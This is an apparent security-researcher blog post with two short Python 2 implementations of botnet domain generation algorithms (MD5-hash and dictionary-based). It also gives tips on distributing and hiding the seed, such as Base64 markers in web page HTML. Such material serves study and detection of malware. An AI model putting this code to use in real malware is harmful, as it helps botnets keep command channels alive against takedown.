# Domain Generation Algorithm (DGA): Python Implementation
Ways to disseminate the DGA seed: (1) Spread inside the bot config (easy but insecure); (2) Generate based on the GetSystemInfo & GetCurrentUser etc. (local environment) (more secure) (3) Pull additional websites based off the seed websites' HTML source code . Example, <p> ROEbG92ZXJhaW4ueHl6ROE </p> # ROE is a marker for Base64-encoded loverain.xyz 1. # -*- coding: utf-8 -*- import hashlib def md5_dga(seed): var = hashlib.md5() # hash the seed using the entry algorithm var.update(seed) name = var.hexdigest() # cut all the strings after the 10th one part = name[:10] return "{}.xyz".format(part) seed = "cm9jayduJ3JvbGw=" # ASCII: rock'n'roll for x in range(12): seed = md5_dga(seed) print seed 2. # -*- coding: utf-8 -*- import hashlib dga_dictionary = ['btc', 'love', 'bit','rain','drop'] def dictionary_dga(seed): ln = len(dga_dictionary) # check the maximum length of the DGA dictionary if ln * ln <= seed: return False # choose 2 words first = seed / ln last = seed % ln # create an address concatenating variable 1 + variable 2 addr = "{}{}.xyz".format(dga_dictionary[first],dga_dictionary[last]) return addr for x in range(20): print dictionary_dga(x)
0 Comments
|
AuthorVitali Kremez Archives
July 2016
Categories |